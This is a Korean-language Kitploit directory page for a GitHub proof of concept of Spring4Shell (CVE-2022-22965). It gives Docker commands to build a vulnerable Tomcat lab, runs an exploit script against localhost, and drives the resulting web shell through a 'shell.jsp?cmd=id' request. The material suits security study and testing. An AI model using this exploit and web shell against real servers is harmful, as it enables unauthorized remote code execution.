Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-22965-Spring4Shell — CVE-2022-22965 Spring4Shell에 대한 PoC 및 익스플로잇 | Kitploit
도구/GitHubGitHub/jakabakos/cve-2022-22965-spring4shell
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubjakabakos/cve-2022-22965-spring4shell

CVE-2022-22965-Spring4Shell

CVE-2022-22965 Spring4Shell에 대한 PoC 및 익스플로잇

저장소 보기
2213년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Spring4Shell

Spring4Shell (CVE-2022-22965) 취약한 Tomcat 서버와 취약한 spring4shell 애플리케이션을 포함한 개념 증명(PoC).

이 취약점에 대한 세부 정보

  • https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc
  • https://www.springcloud.io/post/2022-03/spring-0day-vulnerability
  • https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

사용 방법

이미지 빌드

root@kitploit:~
docker build . -t spring4shell

컨테이너 실행

root@kitploit:~
docker run -p 80:8080 spring4shell

필요한 경우 디버거 포트도 함께 노출하여 실행할 수 있습니다:

root@kitploit:~
docker run -p 80:8080 –p 5005:5005 spring4shell

IntelliJ Idea에서 원격 디버거를 설정하는 방법에 대한 자세한 내용은 원본 블로그 게시물을 참조하세요!

익스플로잇 실행

root@kitploit:~
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell

그런 다음 다음과 같이 원격으로 모든 명령을 실행할 수 있습니다:

root@kitploit:~
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -

...또는 위의 URL을 방문하여 실행할 수 있습니다.

도구 다운로드